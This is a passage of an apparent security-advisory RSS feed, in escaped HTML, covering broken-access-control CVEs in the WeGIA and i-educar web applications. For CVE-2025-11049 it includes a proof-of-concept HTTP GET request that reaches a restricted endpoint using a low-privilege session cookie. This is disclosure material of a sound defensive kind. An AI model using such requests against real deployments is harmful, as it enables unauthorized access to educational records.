&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;cpf&amp;amp;#34;: &amp;amp;#34;649.659.320-56&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;valor_periodo&amp;amp;#34;: &amp;amp;#34;5000.00&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;email&amp;amp;#34;: &amp;amp;#34;teste@teste.com&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;tipo&amp;amp;#34;: &amp;amp;#34;F\u00edsica - Mensal - Boleto&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;status&amp;amp;#34;: &amp;amp;#34;Ativo&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;tag&amp;amp;#34;: &amp;amp;#34;Solicitante&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;}]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61665/image.png&amp;#34;
	width=&amp;#34;1534&amp;#34;
	height=&amp;#34;431&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;355&amp;#34;
		data-flex-basis=&amp;#34;854px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 30 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-11049</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-11049/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-11049/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-11049-controle-de-acesso-quebrado-no-endpoint-unificacao-aluno&amp;#34;&amp;gt;CVE-2025-11049: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/unificacao-aluno&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11049&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11049&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/unificacao-aluno&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /unificacao-aluno&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-11049-controle-de-acesso-quebrado-no-endpoint-unificacao-aluno&amp;#34;&amp;gt;CVE-2025-11049: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/unificacao-aluno&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11049&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11049&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/unificacao-aluno&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /unificacao-aluno&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autenticar como um usuário sem privilégios.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11049/image.png&amp;#34;
	width=&amp;#34;1603&amp;#34;
	height=&amp;#34;673&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11049/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11049/image_hu_7e1e16197ca84d77.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;571px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11049/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11049/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11049/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Enviar a seguinte requisição:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /unificacao-aluno HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_consulta_movimento_mensal_lst.php?ano=2025&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_instituicao=1&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_escola=4&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_curso=3&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_serie=&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_turma=&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;data_inicial=01%2F08%2F2025&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;data_final=31%2F08%2F2025&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;modalidade=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[low_privileged cookie]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Podemos observar que temos acesso à página e à função. E esse usuário não deve fazer isso.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11049/image-2.png&amp;#34;
	width=&amp;#34;1585&amp;#34;
	height=&amp;#34;666&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11049/image-2_hu_65700f12f8b3e361.png 480w, /p/cve-2025-11049/image-2_hu_385fd793852dde6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;237&amp;#34;
		data-flex-basis=&amp;#34;571px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11049.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11049.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 27 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-11050</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-11050/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-11050/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-11050-controle-de-acesso-quebrado-no-endpoint-periodo-lancamento&amp;#34;&amp;gt;CVE-2025-11050: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/periodo-lancamento&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11050&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11050&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/periodo-lancamento&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /periodo-lancamento&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-11050-controle-de-acesso-quebrado-no-endpoint-periodo-lancamento&amp;#34;&amp;gt;CVE-2025-11050: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/periodo-lancamento&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11050&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11050&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/periodo-lancamento&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /periodo-lancamento&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autenticar como um usuário sem privilégios.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11050/image.png&amp;#34;
	width=&amp;#34;1603&amp;#34;
	height=&amp;#34;673&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11050/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11050/image_hu_7e1e16197ca84d77.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;571px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11050/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11050/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11050/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
